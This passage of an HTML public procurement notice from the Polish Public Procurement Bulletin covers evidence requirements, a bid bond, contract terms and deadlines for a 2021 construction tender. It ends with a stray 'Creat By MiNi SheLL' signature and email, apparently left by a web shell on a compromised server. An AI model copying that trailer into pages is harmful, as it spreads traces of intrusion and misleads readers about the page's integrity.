Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 Ustawy, wystawionego niewcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływemterminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;5) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4Ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;6) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;b) wykaz robót budowlanych wykonanych nie wcześniej niż wokresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; wykaz może być sporządzony według wzoru stanowiącego Załącznik nr 5 do SWZ;c) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wykaz może być sporządzony według wzoru stanowiącego Załącznik nr 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępując do przetargu jest zobowiązany do wniesienia wadium w wysokości150.000 zł (słownie: sto pięćdziesiąt tysięcy złotych). 2. Wadium wnosi się przed upływemterminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, zwyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy.3.Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniemokresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium naprzedłużony okres związania ofertą.4. Wadium może być wnoszone według wyboru wykonawcyw jednej lub kilku następujących formach:1) pieniądzu;2) gwarancjach bankowych;3)gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez podmioty, o których mowaw art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji RozwojuPrzedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).5. Wadium wnoszone w pieniądzuwpłaca się na następujący numer rachunku bankowego: 84 1160 2202 0000 0002 8211 96216.Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazujezamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie.1. Wykonawcy mogą wspólnie ubiegać się oudzielenie zamówienia. W tym wypadku wykonawcy ustanawiają pełnomocnika doreprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania wpostępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku, dooferty należy załączyć pełnomocnictwo.2. W odniesieniu do warunków dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający sięo udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonająroboty budowlane lub usługi, do realizacji których te zdolności są wymagane.3. W przypadku, októrym mowa w 24.1.2 SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówieniadołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługiwykonają poszczególni wykonawcy.4. Jeżeli zostanie wybrana oferta wykonawców wspólnieubiegających się o udzielenie zamówienia, zamawiający będzie żądać przed zawarciem umowyw sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określony szczegółowo został w Załącznik nr 3 do SWZ - Wzór umowy, § 20, § 21. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-10 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów Ustawy, przysługują środki ochrony prawnej określone w dziale IX Ustawy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com